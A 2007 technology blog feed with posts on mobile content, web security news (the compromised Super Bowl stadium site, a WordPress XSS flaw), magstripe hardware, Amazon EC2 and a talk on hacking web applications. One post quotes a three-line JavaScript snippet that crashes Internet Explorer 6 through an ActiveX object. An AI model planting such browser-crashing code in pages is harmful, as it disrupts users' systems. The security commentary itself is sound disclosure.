| |
| Current Topic: Technology |
|
Social networking goes mobile |
|
|
|---|
| Topic: Technology |
7:03 am EST, Feb 15, 2007 |
The technology executives and analysts here in Barcelona this week are trying to figure out how take all the content found on the Web and migrate it to your mobile device. The mobile phone network operators like to charge for content. One executive, who didn't want to be quoted, told CNN this creates a "closed garden" of content that is controlled by your mobile operator and is dependent on what deals the operator has with a select group of content providers.
I'm pretty sure this will fail. That was the lesson of AOL. Remember all those ads that said "Go to AOL keyword [blah]?" AOL tried to be both an ISP and a rich content provider. Their product was access to a wide range of content, presumably styled and vetted by AOL for "safeness" and accuracy, all in a single easy to access place. This wasn't a bad deal in the mid 90s, when free websites with quality content supported by advertising didn't really exist in large numbers. And even the few sites that did exist were difficult to find because search engines sucked so much. I distinctly remember having to explain to people in 1996 that AOL was not the Internet. So what happened? Things matured. Why spend $20 a month and go to AOL keyword "WebMD" when I can spend $10 a month and go to www.webmd.com. Why visit AOL's software library when I have download.com? Even if everyone at AOL was in the business of generating content for AOL, there was still an several orders of magnitude more people generating content for the web. Suddenly there were hundreds of gates into the theme park that was the Internet, and nobody wanted to wait in line at the most expensive gate. What about mobile phone providers? They are just gates onto a data network. They are trying to provide content their users want, and charge for it. However, they can never provide all the types of content their users want. This is a classic Long Tail issue. You are targeting mobile content at kids. But why? What about the millions of housewives? Coupons, sales, what about recipes? Take a picture of a barcode, and a website tells you meal ideas involving that item. There is definitely something there. This "mobile ISPs providing content" plan will fail as soon as one mobile provider decides to focus on leveraging the content of the entire Internet. If companyA provides the fastest possible access to existing content, put money in caching proxies and into software gateways that automatically reformat HTML to fit a mobile screen they would win. Mobile providers need to embrace their role as "provider of the tubes" and make their money on charging for packets, not trying to decide what I want those packets to contain. Social networking goes mobile |
|
Wired: 27B Stroke 6- Ajax Security at RSA |
|
|
|---|
| Topic: Technology |
12:54 pm EST, Feb 8, 2007 |
The best conference presenters have a story to tell, and this morning, Billy Hoffman -- the lead researcher at Web application security company SPI Dynamics, had a great story to tell Wednesday morning at the RSA security conference about how all your favorite new Web 2.0 applications are a boon to criminals.
I like Wired. I like them alot. Wired: 27B Stroke 6- Ajax Security at RSA |
|
Super Bowl XLI website owned |
|
|
|---|
| Topic: Technology |
2:45 pm EST, Feb 2, 2007 |
Websense® Security Labs™ has discovered that the official website of Dolphin Stadium has been compromised with malicious code. The Dolphin Stadium is currently experiencing a large number of visitors, as it is the home of Sunday's Super Bowl XLI. The site is linked from numerous official Super Bowl websites and various Super Bowl-related search terms return links to the site. A link to a malicious javascript file has been inserted into the header of the front page of the site. Visitors to the site execute the script, which attempts to exploit two vulnerabilities: MS06-014 and MS07-004. Both of these exploits attempt to download and execute a malicious file.
Thanks to Jeremiah Grossman for sending me a message today bringing this to my attention. Declan McCullagh posted some good resources about this. All are plain text and will not harm you. The original HTML page with the nasty JavaScript
Nasty JavaScript file it loads
VBScript file which gets bootstrapped from one of the HTML files Super Bowl XLI website owned |
|
Wordpress Template.PHP HTML Injection Vulnerability |
|
|
|---|
| Topic: Technology |
12:44 am EST, Feb 2, 2007 |
Wordpress is prone to an HTML-injection scripting vulnerability because the application fails to properly sanitize user-supplied input. Versions prior to 2.0.6 are vulnerable to this issue.
Beware all you Memestreams Wordpressians, You have an XSS vuln Wordpress Template.PHP HTML Injection Vulnerability |
|
|
|---|
| Topic: Technology |
1:25 pm EST, Feb 1, 2007 |
Why oh why does Firefox send an HTTP request when I click "View Source?" I already have the source! Its being rendered! Its in the cache! Why the hell are you fetching it again? This is especially nasty when looking at the source for the response to an HTTP POST. That's it. Firefox is going on my "punch in the face" list. |
|
GNUCITIZEN - JavaScript Remoting Dangers |
|
|
|---|
| Topic: Technology |
11:49 am EST, Jan 31, 2007 |
For those unfamiliar, GNUCITIZEN is quite possibly the best site on the internet for web security research that is not affiliated with a vendor. pdp has covered topics such as backdooring Quicktime files, building XSS attack libraries, improving existing protscanners and history stealers, and even a JavaScript web crawler (which is currently receiving a massive improvement...). Much of his work ends up appearing in live attacks a few months after the info is released. Needless to say I was really happy when pdp asked me to write a blog entry for his site. I wrote up a meaty overview of the different methods JavaScript can use to send HTTP requests, as well as the pros and cons of each. GNUCITIZEN - JavaScript Remoting Dangers |
|
|
|---|
| Topic: Technology |
11:23 am EST, Jan 31, 2007 |
The MT-85 is a LoCo manual swipe magstripe encoder-reader that allows financial cards, ID badges, or passbooks to be instantly encoded and issued to customers. Its compact footprint and rugged design make it an ideal choice for magstripe card, badge, or passbook issuance at financial institutions, schools, businesses, and government environments. An RS-232 interface and simplified command set allow for quick integration with software applications. An LED provides clear status indications to the operator. Available in either Track-2 only, or Track 1, 2, 3 configurations, the MT-85 encodes and read-verifies magnetic data per the ISO 7810 low-coercivity magstripe standards.
These guys give C code driver examples. They ROCK. This is a good reason to start working on StripeSnoop some more. I haven't touched the project since I graduated from GaTech in spring of 2005, but there is still a fair bit of interest in it. Elliot over a Hack a Day tells me its one of the best magstripe suites out there and people love it. MT-85 |
|
|
|---|
| Topic: Technology |
2:36 pm EST, Jan 29, 2007 |
The Amazon Elastic Compute Cloud (Amazon EC2) web service provides you with the ability to execute your applications in Amazon's computing environment. To use Amazon EC2 you simply: 1. Create an Amazon Machine Image (AMI) containing all your software, including your operating system and associated configuration settings, applications, libraries, etc. Think of this as zipping up the contents of your hard drive. We provide all the necessary tools to create and package your AMI.
2. Upload this AMI to the Amazon S3 (Amazon Simple Storage Service) service. This gives us reliable, secure access to your AMI.
3. Register your AMI with Amazon EC2. This allows us to verify that your AMI has been uploaded correctly and to allocate a unique identifier for it.
4. Use this AMI ID and the Amazon EC2 web service APIs to run, monitor, and terminate as many instances of this AMI as required. Currently, we provide command line tools and Java libraries, and you may also directly access our SOAP or Query based APIs.
Think Sun's Grid computing, only cheaper, with virtualized machine images. I've got an immense project needing lots of CPU power and RAM but it should only last a few weeks if I do it right. This might be the ticket. Amazon - EC2 |
|
ActiveX DoS in all IE < 7 |
|
|
|---|
| Topic: Technology |
10:54 am EST, Jan 29, 2007 |
Ok, DoS against a browser isn't too interesting, but look at the code:
<script language="JavaScript">
obj = new ActiveXObject("giffile");
obj.bgColor;
</script>
That it!?! How did someone miss that! A simple programming mistake would have caused this! ActiveX DoS in all IE < 7 |
|
|
|---|
| Topic: Technology |
8:18 pm EST, Jan 28, 2007 |
Title: A Hacker's approach to Web Applications Abstract:
This talk will be a live demonstration of how a hacker discovers, analyzes, attacks, and exploits a web application. I will have several sites running on test machines that we will attack. Specific topics include performing reconnaissance, detecting and fingerprinting backend systems, and how to properly utilize different attack vectors like XSS, XSRF, and SQL Injection to do maximum damage to the site. I'll poke holes in common web security myths and I'll also discuss my experiences with pen testing real world sites. Finally, I'll show how to properly secure a website against evil people. Bio:
Acidus spends his days trying to destroy the Intarweb as the lead R&D engineer at a major web security firm. He is far too curious for his own good, and likes really girlie drinks. You know, the kind that come in funny glasses with lots of fruit in them. Seriously, someone buy him a dark beer and some testicles. |
|
